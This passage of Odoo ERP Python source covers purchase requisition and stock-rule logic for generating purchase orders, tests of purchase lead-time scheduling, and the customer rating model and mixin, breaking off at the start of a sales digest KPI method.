def create(self, vals):
purchase = super(PurchaseOrder, self).create(vals)
if purchase.requisition_id:
purchase.message_post_with_view('mail.message_origin_link',
values={'self': purchase, 'origin': purchase.requisition_id},
subtype_id=self.env['ir.model.data'].xmlid_to_res_id('mail.mt_note'))
return purchase
@api.multi
def write(self, vals):
result = super(PurchaseOrder, self).write(vals)
if vals.get('requisition_id'):
self.message_post_with_view('mail.message_origin_link',
values={'self': self, 'origin': self.requisition_id, 'edit': True},
subtype_id=self.env['ir.model.data'].xmlid_to_res_id('mail.mt_note'))
return result
class PurchaseOrderLine(models.Model):
_inherit = "purchase.order.line"
@api.onchange('product_qty', 'product_uom')
def _onchange_quantity(self):
res = super(PurchaseOrderLine, self)._onchange_quantity()
if self.order_id.requisition_id:
for line in self.order_id.requisition_id.line_ids.filtered(lambda l: l.product_id == self.product_id):
if line.product_uom_id != self.product_uom:
self.price_unit = line.product_uom_id._compute_price(
line.price_unit, self.product_uom)
else:
self.price_unit = line.price_unit
break
return res
class ProductProduct(models.Model):
_inherit = 'product.product'
def _prepare_sellers(self, params):
sellers = super(ProductProduct, self)._prepare_sellers(params)
if params and params.get('order_id'):
return sellers.filtered(lambda s: not s.purchase_requisition_id or s.purchase_requisition_id == params['order_id'].requisition_id)
else:
return sellers
class ProductTemplate(models.Model):
_inherit = 'product.template'
purchase_requisition = fields.Selection(
[('rfq', 'Create a draft purchase order'),
('tenders', 'Propose a call for tenders')],
string='Procurement', default='rfq',
help="Create a draft purchase order: Based on your product configuration, the system will create a draft "
"purchase order.Propose a call for tender : If the 'purchase_requisition' module is installed and this option "
"is selected, the system will create a draft call for tender.")
class StockMove(models.Model):
_inherit = "stock.move"
requistion_line_ids = fields.One2many('purchase.requisition.line', 'move_dest_id')
class ProcurementGroup(models.Model):
_inherit = 'procurement.group'
@api.model
def _get_exceptions_domain(self):
return super(ProcurementGroup, self)._get_exceptions_domain() + [('requistion_line_ids', '=', False)]
class StockRule(models.Model):
_inherit = 'stock.rule'
@api.multi
def _run_buy(self, product_id, product_qty, product_uom, location_id, name, origin, values):
if product_id.purchase_requisition != 'tenders':
return super(StockRule, self)._run_buy(product_id, product_qty, product_uom, location_id, name, origin, values)
values = self.env['purchase.requisition']._prepare_tender_values(product_id, product_qty, product_uom, location_id, name, origin, values)
values['picking_type_id'] = self.picking_type_id.id
self.env['purchase.requisition'].create(values)
return True
def _prepare_purchase_order(self, product_id, product_qty, product_uom, origin, values, partner):
res = super(StockRule, self)._prepare_purchase_order(product_id, product_qty, product_uom, origin, values, partner)
res['partner_ref'] = values['supplier'].purchase_requisition_id.name
res['requisition_id'] = values['supplier'].purchase_requisition_id.id
if values['supplier'].purchase_requisition_id.currency_id:
res['currency_id'] = values['supplier'].purchase_requisition_id.currency_id.id
return res
def _make_po_get_domain(self, values, partner):
domain = super(StockRule, self)._make_po_get_domain(values, partner)
if 'supplier' in values and values['supplier'].purchase_requisition_id:
domain += (
('requisition_id', '=', values['supplier'].purchase_requisition_id.id),
)
return domain
class StockMove(models.Model):
_inherit = 'stock.move'
requisition_line_ids = fields.One2many('purchase.requisition.line', 'move_dest_id')
def _get_upstream_documents_and_responsibles(self, visited):
if self.requisition_line_ids:
return [(requisition_line.requisition_id, requisition_line.requisition_id.user_id, visited) for requisition_line in self.requisition_line_ids if requisition_line.requisition_id.state not in ('done', 'cancel')]
else:
return super(StockMove, self)._get_upstream_documents_and_responsibles(visited)
class Orderpoint(models.Model):
_inherit = "stock.warehouse.orderpoint"
def _quantity_in_progress(self):
res = super(Orderpoint, self)._quantity_in_progress()
for op in self:
for pr in self.env['purchase.requisition'].search([('state','=','draft'),('origin','=',op.name)]):
for prline in pr.line_ids.filtered(lambda l: l.product_id.id == op.product_id.id):
res[op.id] += prline.product_uom_id._compute_quantity(prline.product_qty, op.product_uom, round=False)
return res
```
#### File: purchase_stock/models/stock_rule.py
```python
from dateutil.relativedelta import relativedelta
from odoo import api, fields, models, _
from odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT
from odoo.exceptions import UserError
class StockRule(models.Model):
_inherit = 'stock.rule'
action = fields.Selection(selection_add=[('buy', 'Buy')])
def _get_message_dict(self):
message_dict = super(StockRule, self)._get_message_dict()
dummy, destination, dummy = self._get_message_values()
message_dict.update({
'buy': _('When products are needed in <b>%s</b>, <br/> a request for quotation is created to fulfill the need.') % (destination)
})
return message_dict
@api.onchange('action')
def _onchange_action(self):
domain = {'picking_type_id': []}
if self.action == 'buy':
self.location_src_id = False
domain = {'picking_type_id': [('code', '=', 'incoming')]}
return {'domain': domain}
@api.multi
def _run_buy(self, product_id, product_qty, product_uom, location_id, name, origin, values):
cache = {}
suppliers = product_id.seller_ids\
.filtered(lambda r: (not r.company_id or r.company_id == values['company_id']) and (not r.product_id or r.product_id == product_id) and r.name.active)
if not suppliers:
msg = _('There is no vendor associated to the product %s. Please define a vendor for this product.') % (product_id.display_name,)
raise UserError(msg)
supplier = self._make_po_select_supplier(values, suppliers)
partner = supplier.name
# we put `supplier_info` in values for extensibility purposes
values['supplier'] = supplier
domain = self._make_po_get_domain(values, partner)
if domain in cache:
po = cache[domain]
else:
po = self.env['purchase.order'].sudo().search([dom for dom in domain])
po = po[0] if po else False
cache[domain] = po
if not po:
vals = self._prepare_purchase_order(product_id, product_qty, product_uom, origin, values, partner)
company_id = values.get('company_id') and values['company_id'].id or self.env.user.company_id.id
po = self.env['purchase.order'].with_context(force_company=company_id).sudo().create(vals)
cache[domain] = po
elif not po.origin or origin not in po.origin.split(', '):
if po.origin:
if origin:
po.write({'origin': po.origin + ', ' + origin})
else:
po.write({'origin': po.origin})
else:
po.write({'origin': origin})
# Create Line
po_line = False
for line in po.order_line:
if line.product_id == product_id and line.product_uom == product_id.uom_po_id:
if line._merge_in_existing_line(product_id, product_qty, product_uom, location_id, name, origin, values):
vals = self._update_purchase_order_line(product_id, product_qty, product_uom, values, line, partner)
po_line = line.write(vals)
break
if not po_line:
vals = self._prepare_purchase_order_line(product_id, product_qty, product_uom, values, po, partner)
self.env['purchase.order.line'].sudo().create(vals)
def _get_purchase_schedule_date(self, values):
"""Return the datetime value to use as Schedule Date (``date_planned``) for the
Purchase Order Lines created to satisfy the given procurement. """
procurement_date_planned = fields.Datetime.from_string(values['date_planned'])
schedule_date = (procurement_date_planned - relativedelta(days=values['company_id'].po_lead))
return schedule_date
def _get_purchase_order_date(self, product_id, product_qty, product_uom, values, partner, schedule_date):
"""Return the datetime value to use as Order Date (``date_order``) for the
Purchase Order created to satisfy the given procurement. """
seller = product_id.with_context(force_company=values['company_id'].id)._select_seller(
partner_id=partner,
quantity=product_qty,
date=schedule_date and schedule_date.date(),
uom_id=product_uom)
return schedule_date - relativedelta(days=int(seller.delay))
def _update_purchase_order_line(self, product_id, product_qty, product_uom, values, line, partner):
procurement_uom_po_qty = product_uom._compute_quantity(product_qty, product_id.uom_po_id)
seller = product_id.with_context(force_company=values['company_id'].id)._select_seller(
partner_id=partner,
quantity=line.product_qty + procurement_uom_po_qty,
date=line.order_id.date_order and line.order_id.date_order.date(),
uom_id=product_id.uom_po_id)
price_unit = self.env['account.tax']._fix_tax_included_price_company(seller.price, line.product_id.supplier_taxes_id, line.taxes_id, values['company_id']) if seller else 0.0
if price_unit and seller and line.order_id.currency_id and seller.currency_id != line.order_id.currency_id:
price_unit = seller.currency_id._convert(
price_unit, line.order_id.currency_id, line.order_id.company_id, fields.Date.today())
res = {
'product_qty': line.product_qty + procurement_uom_po_qty,
'price_unit': price_unit,
'move_dest_ids': [(4, x.id) for x in values.get('move_dest_ids', [])]
}
orderpoint_id = values.get('orderpoint_id')
if orderpoint_id:
res['orderpoint_id'] = orderpoint_id.id
return res
@api.multi
def _prepare_purchase_order_line(self, product_id, product_qty, product_uom, values, po, partner):
procurement_uom_po_qty = product_uom._compute_quantity(product_qty, product_id.uom_po_id)
seller = product_id.with_context(force_company=values['company_id'].id)._select_seller(
partner_id=partner,
quantity=procurement_uom_po_qty,
date=po.date_order and po.date_order.date(),
uom_id=product_id.uom_po_id)
taxes = product_id.supplier_taxes_id
fpos = po.fiscal_position_id
taxes_id = fpos.map_tax(taxes, product_id, seller.name) if fpos else taxes
if taxes_id:
taxes_id = taxes_id.filtered(lambda x: x.company_id.id == values['company_id'].id)
price_unit = self.env['account.tax']._fix_tax_included_price_company(seller.price, product_id.supplier_taxes_id, taxes_id, values['company_id']) if seller else 0.0
if price_unit and seller and po.currency_id and seller.currency_id != po.currency_id:
price_unit = seller.currency_id._convert(
price_unit, po.currency_id, po.company_id, po.date_order or fields.Date.today())
product_lang = product_id.with_context({
'lang': partner.lang,
'partner_id': partner.id,
})
name = product_lang.display_name
if product_lang.description_purchase:
name += '\n' + product_lang.description_purchase
date_planned = self.env['purchase.order.line']._get_date_planned(seller, po=po).strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return {
'name': name,
'product_qty': procurement_uom_po_qty,
'product_id': product_id.id,
'product_uom': product_id.uom_po_id.id,
'price_unit': price_unit,
'date_planned': date_planned,
'orderpoint_id': values.get('orderpoint_id', False) and values.get('orderpoint_id').id,
'taxes_id': [(6, 0, taxes_id.ids)],
'order_id': po.id,
'move_dest_ids': [(4, x.id) for x in values.get('move_dest_ids', [])],
}
def _prepare_purchase_order(self, product_id, product_qty, product_uom, origin, values, partner):
schedule_date = self._get_purchase_schedule_date(values)
purchase_date = self._get_purchase_order_date(product_id, product_qty, product_uom, values, partner, schedule_date)
fpos = self.env['account.fiscal.position'].with_context(force_company=values['company_id'].id).get_fiscal_position(partner.id)
gpo = self.group_propagation_option
group = (gpo == 'fixed' and self.group_id.id) or \
(gpo == 'propagate' and values.get('group_id') and values['group_id'].id) or False
return {
'partner_id': partner.id,
'picking_type_id': self.picking_type_id.id,
'company_id': values['company_id'].id,
'currency_id': partner.with_context(force_company=values['company_id'].id).property_purchase_currency_id.id or values['company_id'].currency_id.id,
'dest_address_id': values.get('partner_id', False),
'origin': origin,
'payment_term_id': partner.with_context(force_company=values['company_id'].id).property_supplier_payment_term_id.id,
'date_order': purchase_date.strftime(DEFAULT_SERVER_DATETIME_FORMAT),
'fiscal_position_id': fpos,
'group_id': group
}
def _make_po_select_supplier(self, values, suppliers):
""" Method intended to be overridden by customized modules to implement any logic in the
selection of supplier.
"""
return suppliers[0]
def _make_po_get_domain(self, values, partner):
domain = super(StockRule, self)._make_po_get_domain(values, partner)
gpo = self.group_propagation_option
group = (gpo == 'fixed' and self.group_id) or \
(gpo == 'propagate' and 'group_id' in values and values['group_id']) or False
domain += (
('partner_id', '=', partner.id),
('state', '=', 'draft'),
('picking_type_id', '=', self.picking_type_id.id),
('company_id', '=', values['company_id'].id),
)
if group:
domain += (('group_id', '=', group.id),)
return domain
def _push_prepare_move_copy_values(self, move_to_copy, new_date):
res = super(StockRule, self)._push_prepare_move_copy_values(move_to_copy, new_date)
res['purchase_line_id'] = None
return res
```
#### File: purchase_stock/tests/test_purchase_lead_time.py
```python
from datetime import timedelta
from odoo import fields
from .common import TestPurchase
class TestPurchaseLeadTime(TestPurchase):
def test_00_product_company_level_delays(self):
""" To check dates, set product's Delivery Lead Time
and company's Purchase Lead Time."""
company = self.env.ref('base.main_company')
# Update company with Purchase Lead Time
company.write({'po_lead': 3.00})
# Make procurement request from product_1's form view, create procurement and check it's state
date_planned = fields.Datetime.to_string(fields.datetime.now() + timedelta(days=10))
self._create_make_procurement(self.product_1, 15.00, date_planned=date_planned)
purchase = self.env['purchase.order.line'].search([('product_id', '=', self.product_1.id)], limit=1).order_id
# Confirm purchase order
purchase.button_confirm()
# Check order date of purchase order
order_date = fields.Datetime.from_string(date_planned) - timedelta(days=company.po_lead) - timedelta(days=self.product_1.seller_ids.delay)
self.assertEqual(purchase.date_order, order_date, 'Order date should be equal to: Date of the procurement order - Purchase Lead Time - Delivery Lead Time.')
# Check scheduled date of purchase order
schedule_date = order_date + timedelta(days=self.product_1.seller_ids.delay)
self.assertEqual(purchase.date_planned, schedule_date, 'Schedule date should be equal to: Order date of Purchase order + Delivery Lead Time.')
# check the picking created or not
self.assertTrue(purchase.picking_ids, "Picking should be created.")
# Check scheduled date of In Type shipment
self.assertEqual(purchase.picking_ids.scheduled_date, schedule_date, 'Schedule date of In type shipment should be equal to: schedule date of purchase order.')
def test_01_product_level_delay(self):
""" To check schedule dates of multiple purchase order line of the same purchase order,
we create two procurements for the two different product with same vendor
and different Delivery Lead Time."""
# Make procurement request from product_1's form view, create procurement and check it's state
date_planned1 = fields.Datetime.to_string(fields.datetime.now() + timedelta(days=10))
self._create_make_procurement(self.product_1, 10.00, date_planned=date_planned1)
purchase1 = self.env['purchase.order.line'].search([('product_id', '=', self.product_1.id)], limit=1).order_id
# Make procurement request from product_2's form view, create procurement and check it's state
date_planned2 = fields.Datetime.to_string(fields.datetime.now() + timedelta(days=10))
self._create_make_procurement(self.product_2, 5.00, date_planned=date_planned2)
purchase2 = self.env['purchase.order.line'].search([('product_id', '=', self.product_2.id)], limit=1).order_id
# Check purchase order is same or not
self.assertEqual(purchase1, purchase2, 'Purchase orders should be same for the two different product with same vendor.')
# Confirm purchase order
purchase1.button_confirm()
# Check order date of purchase order
order_line_pro_1 = purchase2.order_line.filtered(lambda r: r.product_id == self.product_1)
order_line_pro_2 = purchase2.order_line.filtered(lambda r: r.product_id == self.product_2)
order_date = fields.Datetime.from_string(date_planned1) - timedelta(days=self.product_1.seller_ids.delay)
self.assertEqual(purchase2.date_order, order_date, 'Order date should be equal to: Date of the procurement order - Delivery Lead Time.')
# Check scheduled date of purchase order line for product_1
schedule_date_1 = order_date + timedelta(days=self.product_1.seller_ids.delay)
self.assertEqual(order_line_pro_1.date_planned, schedule_date_1, 'Schedule date of purchase order line for product_1 should be equal to: Order date of purchase order + Delivery Lead Time of product_1.')
# Check scheduled date of purchase order line for product_2
schedule_date_2 = order_date + timedelta(days=self.product_2.seller_ids.delay)
self.assertEqual(order_line_pro_2.date_planned, schedule_date_2, 'Schedule date of purchase order line for product_2 should be equal to: Order date of purchase order + Delivery Lead Time of product_2.')
# Check scheduled date of purchase order
po_schedule_date = min(schedule_date_1, schedule_date_2)
self.assertEqual(purchase2.date_planned, po_schedule_date, 'Schedule date of purchase order should be minimum of schedule dates of purchase order lines.')
# Check the picking created or not
self.assertTrue(purchase2.picking_ids, "Picking should be created.")
# Check scheduled date of In Type shipment
self.assertEqual(purchase2.picking_ids.scheduled_date, po_schedule_date, 'Schedule date of In type shipment should be same as schedule date of purchase order.')
def test_02_product_route_level_delays(self):
""" In order to check dates, set product's Delivery Lead Time
and warehouse route's delay."""
# Update warehouse_1 with Incoming Shipments 3 steps
self.warehouse_1.write({'reception_steps': 'three_steps'})
# Set delay on push rule
for push_rule in self.warehouse_1.reception_route_id.rule_ids:
push_rule.write({'delay': 2})
rule_delay = sum(self.warehouse_1.reception_route_id.rule_ids.mapped('delay'))
date_planned = fields.Datetime.to_string(fields.datetime.now() + timedelta(days=10))
# Create procurement order of product_1
self.env['procurement.group'].run(self.product_1, 5.000, self.uom_unit, self.warehouse_1.lot_stock_id, 'Test scheduler for RFQ', '/', {
'warehouse_id': self.warehouse_1,
'date_planned': date_planned, # 10 days added to current date of procurement to get future schedule date and order date of purchase order.
'rule_id': self.warehouse_1.buy_pull_id,
'group_id': False,
'route_ids': [],
})
# Confirm purchase order
purchase = self.env['purchase.order.line'].search([('product_id', '=', self.product_1.id)], limit=1).order_id
purchase.button_confirm()
# Check order date of purchase order
order_date = fields.Datetime.from_string(date_planned) - timedelta(days=self.product_1.seller_ids.delay + rule_delay)
self.assertEqual(purchase.date_order, order_date, 'Order date should be equal to: Date of the procurement order - Delivery Lead Time(supplier and pull rules).')
# Check scheduled date of purchase order
schedule_date = order_date + timedelta(days=self.product_1.seller_ids.delay + rule_delay)
self.assertEqual(date_planned, str(schedule_date), 'Schedule date should be equal to: Order date of Purchase order + Delivery Lead Time(supplier and pull rules).')
# Check the picking crated or not
self.assertTrue(purchase.picking_ids, "Picking should be created.")
# Check scheduled date of Internal Type shipment
incoming_shipment1 = self.env['stock.picking'].search([('move_lines.product_id', 'in', (self.product_1.id, self.product_2.id)), ('picking_type_id', '=', self.warehouse_1.int_type_id.id), ('location_id', '=', self.warehouse_1.wh_input_stock_loc_id.id), ('location_dest_id', '=', self.warehouse_1.wh_qc_stock_loc_id.id)])
incoming_shipment1_date = order_date + timedelta(days=self.product_1.seller_ids.delay)
self.assertEqual(incoming_shipment1.scheduled_date, incoming_shipment1_date, 'Schedule date of Internal Type shipment for input stock location should be equal to: schedule date of purchase order + push rule delay.')
incoming_shipment2 = self.env['stock.picking'].search([('picking_type_id', '=', self.warehouse_1.int_type_id.id), ('location_id', '=', self.warehouse_1.wh_qc_stock_loc_id.id), ('location_dest_id', '=', self.warehouse_1.lot_stock_id.id)])
incoming_shipment2_date = schedule_date - timedelta(days=incoming_shipment2.move_lines[0].rule_id.delay)
self.assertEqual(incoming_shipment2.scheduled_date, incoming_shipment2_date, 'Schedule date of Internal Type shipment for quality control stock location should be equal to: schedule date of Internal type shipment for input stock location + push rule delay..')
```
#### File: rating/models/rating.py
```python
import base64
import uuid
from datetime import timedelta
from odoo import api, fields, models, tools, _
from odoo.modules.module import get_resource_path
RATING_LIMIT_SATISFIED = 7
RATING_LIMIT_OK = 3
RATING_LIMIT_MIN = 1
class Rating(models.Model):
_name = "rating.rating"
_description = "Rating"
_order = 'write_date desc'
_rec_name = 'res_name'
_sql_constraints = [
('rating_range', 'check(rating >= 0 and rating <= 10)', 'Rating should be between 0 to 10'),
]
@api.one
@api.depends('res_model', 'res_id')
def _compute_res_name(self):
name = self.env[self.res_model].sudo().browse(self.res_id).name_get()
self.res_name = name and name[0][1] or ('%s/%s') % (self.res_model, self.res_id)
@api.model
def new_access_token(self):
return uuid.uuid4().hex
res_name = fields.Char(string='Resource name', compute='_compute_res_name', store=True, help="The name of the rated resource.")
res_model_id = fields.Many2one('ir.model', 'Related Document Model', index=True, ondelete='cascade', help='Model of the followed resource')
res_model = fields.Char(string='Document Model', related='res_model_id.model', store=True, index=True, readonly=True)
res_id = fields.Integer(string='Document', required=True, help="Identifier of the rated object", index=True)
parent_res_name = fields.Char('Parent Document Name', compute='_compute_parent_res_name', store=True)
parent_res_model_id = fields.Many2one('ir.model', 'Parent Related Document Model', index=True, ondelete='cascade')
parent_res_model = fields.Char('Parent Document Model', store=True, related='parent_res_model_id.model', index=True, readonly=False)
parent_res_id = fields.Integer('Parent Document', index=True)
rated_partner_id = fields.Many2one('res.partner', string="Rated person", help="Owner of the rated resource")
partner_id = fields.Many2one('res.partner', string='Customer', help="Author of the rating")
rating = fields.Float(string="Rating Number", group_operator="avg", default=0, help="Rating value: 0=Unhappy, 10=Happy")
rating_image = fields.Binary('Image', compute='_compute_rating_image')
rating_text = fields.Selection([
('satisfied', 'Satisfied'),
('not_satisfied', 'Not satisfied'),
('highly_dissatisfied', 'Highly dissatisfied'),
('no_rating', 'No Rating yet')], string='Rating', store=True, compute='_compute_rating_text', readonly=True)
feedback = fields.Text('Comment', help="Reason of the rating")
message_id = fields.Many2one('mail.message', string="Linked message", help="Associated message when posting a review. Mainly used in website addons.", index=True)
access_token = fields.Char('Security Token', default=new_access_token, help="Access token to set the rating of the value")
consumed = fields.Boolean(string="Filled Rating", help="Enabled if the rating has been filled.")
@api.depends('parent_res_model', 'parent_res_id')
def _compute_parent_res_name(self):
for rating in self:
name = False
if rating.parent_res_model and rating.parent_res_id:
name = self.env[rating.parent_res_model].sudo().browse(rating.parent_res_id).name_get()
name = name and name[0][1] or ('%s/%s') % (rating.parent_res_model, rating.parent_res_id)
rating.parent_res_name = name
@api.multi
@api.depends('rating')
def _compute_rating_image(self):
for rating in self:
try:
image_path = get_resource_path('rating', 'static/src/img', 'rating_%s.png' % (int(rating.rating),))
rating.rating_image = base64.b64encode(open(image_path, 'rb').read())
except (IOError, OSError):
rating.rating_image = False
@api.depends('rating')
def _compute_rating_text(self):
for rating in self:
if rating.rating >= RATING_LIMIT_SATISFIED:
rating.rating_text = 'satisfied'
elif rating.rating > RATING_LIMIT_OK:
rating.rating_text = 'not_satisfied'
elif rating.rating >= RATING_LIMIT_MIN:
rating.rating_text = 'highly_dissatisfied'
else:
rating.rating_text = 'no_rating'
@api.model
def create(self, values):
if values.get('res_model_id') and values.get('res_id'):
values.update(self._find_parent_data(values))
return super(Rating, self).create(values)
@api.multi
def write(self, values):
if values.get('res_model_id') and values.get('res_id'):
values.update(self._find_parent_data(values))
return super(Rating, self).write(values)
def _find_parent_data(self, values):
""" Determine the parent res_model/res_id, based on the values to create or write """
current_model_name = self.env['ir.model'].sudo().browse(values['res_model_id']).model
current_record = self.env[current_model_name].browse(values['res_id'])
data = {
'parent_res_model_id': False,
'parent_res_id': False,
}
if hasattr(current_record, 'rating_get_parent'):
current_record_parent = current_record.rating_get_parent()
if current_record_parent:
parent_res_model = getattr(current_record, current_record_parent)
data['parent_res_model_id'] = self.env['ir.model']._get(parent_res_model._name).id
data['parent_res_id'] = parent_res_model.id
return data
@api.multi
def reset(self):
for record in self:
record.write({
'rating': 0,
'access_token': record.new_access_token(),
'feedback': False,
'consumed': False,
})
def action_open_rated_object(self):
self.ensure_one()
return {
'type': 'ir.actions.act_window',
'res_model': self.res_model,
'res_id': self.res_id,
'views': [[False, 'form']]
}
class RatingMixin(models.AbstractModel):
_name = 'rating.mixin'
_description = "Rating Mixin"
rating_ids = fields.One2many('rating.rating', 'res_id', string='Rating', domain=lambda self: [('res_model', '=', self._name)], auto_join=True)
rating_last_value = fields.Float('Rating Last Value', compute='_compute_rating_last_value', compute_sudo=True, store=True)
rating_last_feedback = fields.Text('Rating Last Feedback', related='rating_ids.feedback', readonly=False)
rating_last_image = fields.Binary('Rating Last Image', related='rating_ids.rating_image', readonly=False)
rating_count = fields.Integer('Rating count', compute="_compute_rating_count")
@api.multi
@api.depends('rating_ids.rating')
def _compute_rating_last_value(self):
for record in self:
ratings = self.env['rating.rating'].search([('res_model', '=', self._name), ('res_id', '=', record.id)], limit=1)
if ratings:
record.rating_last_value = ratings.rating
@api.multi
@api.depends('rating_ids')
def _compute_rating_count(self):
read_group_res = self.env['rating.rating'].read_group(
[('res_model', '=', self._name), ('res_id', 'in', self.ids), ('consumed', '=', True)],
['res_id'], groupby=['res_id'])
result = dict.fromkeys(self.ids, 0)
for data in read_group_res:
result[data['res_id']] += data['res_id_count']
for record in self:
record.rating_count = result.get(record.id)
def write(self, values):
""" If the rated ressource name is modified, we should update the rating res_name too.
If the rated ressource parent is changed we should update the parent_res_id too"""
with self.env.norecompute():
result = super(RatingMixin, self).write(values)
for record in self:
if record._rec_name in values: # set the res_name of ratings to be recomputed
res_name_field = self.env['rating.rating']._fields['res_name']
record.rating_ids._recompute_todo(res_name_field)
if record.rating_get_parent() in values:
record.rating_ids.write({'parent_res_id': record[record.rating_get_parent()].id})
if self.env.recompute and self._context.get('recompute', True): # trigger the recomputation of all field marked as "to recompute"
self.recompute()
return result
def unlink(self):
""" When removing a record, its rating should be deleted too. """
record_ids = self.ids
result = super(RatingMixin, self).unlink()
self.env['rating.rating'].sudo().search([('res_model', '=', self._name), ('res_id', 'in', record_ids)]).unlink()
return result
def rating_get_parent(self):
"""Return the parent relation field name
Should return a Many2One"""
return None
def rating_get_partner_id(self):
if hasattr(self, 'partner_id') and self.partner_id:
return self.partner_id
return self.env['res.partner']
def rating_get_rated_partner_id(self):
if hasattr(self, 'user_id') and self.user_id.partner_id:
return self.user_id.partner_id
return self.env['res.partner']
def rating_get_access_token(self, partner=None):
if not partner:
partner = self.rating_get_partner_id()
rated_partner = self.rating_get_rated_partner_id()
ratings = self.rating_ids.filtered(lambda x: x.partner_id.id == partner.id and not x.consumed)
if not ratings:
record_model_id = self.env['ir.model'].sudo().search([('model', '=', self._name)], limit=1).id
rating = self.env['rating.rating'].create({
'partner_id': partner.id,
'rated_partner_id': rated_partner.id,
'res_model_id': record_model_id,
'res_id': self.id
})
else:
rating = ratings[0]
return rating.access_token
@api.multi
def rating_send_request(self, template, lang=False, subtype_id=False, force_send=True, composition_mode='comment', notif_layout=None):
""" This method send rating request by email, using a template given
in parameter.
:param template: a mail.template record used to compute the message body;
:param lang: optional lang; it can also be specified directly on the template
itself in the lang field;
:param subtype_id: optional subtype to use when creating the message; is
a note by default to avoid spamming followers;
:param force_send: whether to send the request directly or use the mail
queue cron (preferred option);
:param composition_mode: comment (message_post) or mass_mail (template.send_mail);
:param notif_layout: layout used to encapsulate the content when sending email;
"""
if lang:
template = template.with_context(lang=lang)
if subtype_id is False:
subtype_id = self.env['ir.model.data'].xmlid_to_res_id('mail.mt_note')
if force_send:
self = self.with_context(mail_notify_force_send=True)
for record in self:
record.message_post_with_template(
template.id,
composition_mode=composition_mode,
notif_layout=notif_layout if notif_layout is not None else 'mail.mail_notification_light',
subtype_id=subtype_id
)
@api.multi
def rating_apply(self, rate, token=None, feedback=None, subtype=None):
""" Apply a rating given a token. If the current model inherits from
mail.thread mixing, a message is posted on its chatter.
:param rate : the rating value to apply
:type rate : float
:param token : access token
:param feedback : additional feedback
:type feedback : string
:param subtype : subtype for mail
:type subtype : string
:returns rating.rating record
"""
Rating, rating = self.env['rating.rating'], None
if token:
rating = self.env['rating.rating'].search([('access_token', '=', token)], limit=1)
else:
rating = Rating.search([('res_model', '=', self._name), ('res_id', '=', self.ids[0])], limit=1)
if rating:
rating.write({'rating': rate, 'feedback': feedback, 'consumed': True})
if hasattr(self, 'message_post'):
feedback = tools.plaintext2html(feedback or '')
self.message_post(
body="<img src='/rating/static/src/img/rating_%s.png' alt=':%s/10' style='width:18px;height:18px;float:left;margin-right: 5px;'/>%s"
% (rate, rate, feedback),
subtype=subtype or "mail.mt_comment",
author_id=rating.partner_id and rating.partner_id.id or None # None will set the default author in mail_thread.py
)
if hasattr(self, 'stage_id') and self.stage_id and hasattr(self.stage_id, 'auto_validation_kanban_state') and self.stage_id.auto_validation_kanban_state:
if rating.rating > 5:
self.write({'kanban_state': 'done'})
if rating.rating < 5:
self.write({'kanban_state': 'blocked'})
return rating
@api.multi
def rating_get_repartition(self, add_stats=False, domain=None):
""" get the repatition of rating grade for the given res_ids.
:param add_stats : flag to add stat to the result
:type add_stats : boolean
:param domain : optional extra domain of the rating to include/exclude in repartition
:return dictionnary
if not add_stats, the dict is like
- key is the rating value (integer)
- value is the number of object (res_model, res_id) having the value
otherwise, key is the value of the information (string) : either stat name (avg, total, ...) or 'repartition'
containing the same dict if add_stats was False.
"""
base_domain = [('res_model', '=', self._name), ('res_id', 'in', self.ids), ('rating', '>=', 1), ('consumed', '=', True)]
if domain:
base_domain += domain
data = self.env['rating.rating'].read_group(base_domain, ['rating'], ['rating', 'res_id'])
# init dict with all posible rate value, except 0 (no value for the rating)
values = dict.fromkeys(range(1, 11), 0)
values.update((d['rating'], d['rating_count']) for d in data)
# add other stats
if add_stats:
rating_number = sum(values.values())
result = {
'repartition': values,
'avg': sum(float(key * values[key]) for key in values) / rating_number if rating_number > 0 else 0,
'total': sum(it['rating_count'] for it in data),
}
return result
return values
@api.multi
def rating_get_grades(self, domain=None):
""" get the repatition of rating grade for the given res_ids.
:param domain : optional domain of the rating to include/exclude in grades computation
:return dictionnary where the key is the grade (great, okay, bad), and the value, the number of object (res_model, res_id) having the grade
the grade are compute as 0-30% : Bad
31-69%: Okay
70-100%: Great
"""
data = self.rating_get_repartition(domain=domain)
res = dict.fromkeys(['great', 'okay', 'bad'], 0)
for key in data:
if key >= RATING_LIMIT_SATISFIED:
res['great'] += data[key]
elif key > RATING_LIMIT_OK:
res['okay'] += data[key]
else:
res['bad'] += data[key]
return res
@api.multi
def rating_get_stats(self, domain=None):
""" get the statistics of the rating repatition
:param domain : optional domain of the rating to include/exclude in statistic computation
:return dictionnary where
- key is the the name of the information (stat name)
- value is statistic value : 'percent' contains the repartition in percentage, 'avg' is the average rate
and 'total' is the number of rating
"""
data = self.rating_get_repartition(domain=domain, add_stats=True)
result = {
'avg': data['avg'],
'total': data['total'],
'percent': dict.fromkeys(range(1, 11), 0),
}
for rate in data['repartition']:
result['percent'][rate] = (data['repartition'][rate] * 100) / data['total'] if data['total'] > 0 else 0
return result
@api.model
def _compute_parent_rating_percentage_satisfaction(self, parent_records, rating_satisfaction_days=None):
# build domain and fetch data
domain = [('parent_res_model', '=', parent_records._name), ('parent_res_id', 'in', parent_records.ids), ('rating', '>=', 1), ('consumed', '=', True)]
if rating_satisfaction_days:
domain += [('write_date', '>=', fields.Datetime.to_string(fields.datetime.now() - timedelta(days=rating_satisfaction_days)))]
data = self.env['rating.rating'].read_group(domain, ['parent_res_id', 'rating'], ['parent_res_id', 'rating'], lazy=False)
# get repartition of grades per parent id
default_grades = {'great': 0, 'okay': 0, 'bad': 0}
grades_per_parent = dict((parent_id, dict(default_grades)) for parent_id in parent_records.ids) # map: {parent_id: {'great': 0, 'bad': 0, 'ok': 0}}
for item in data:
parent_id = item['parent_res_id']
rating = item['rating']
if rating >= RATING_LIMIT_SATISFIED:
grades_per_parent[parent_id]['great'] += item['__count']
elif rating > RATING_LIMIT_OK:
grades_per_parent[parent_id]['okay'] += item['__count']
else:
grades_per_parent[parent_id]['bad'] += item['__count']
# compute percentage per parent
res = {}
for record in parent_records:
repartition = grades_per_parent.get(record.id)
res[record.id] = repartition['great'] * 100 / sum(repartition.values()) if sum(repartition.values()) else -1
return res
```
#### File: sale_management/models/digest.py
```python
from odoo import fields, models, _
from odoo.exceptions import AccessError
class Digest(models.Model):
_inherit = 'digest.digest'
kpi_all_sale_total = fields.Boolean('All Sales')
kpi_all_sale_total_value = fields.Monetary(compute='_compute_kpi_sale_total_value')
def _compute_kpi_sale_total_value(self):
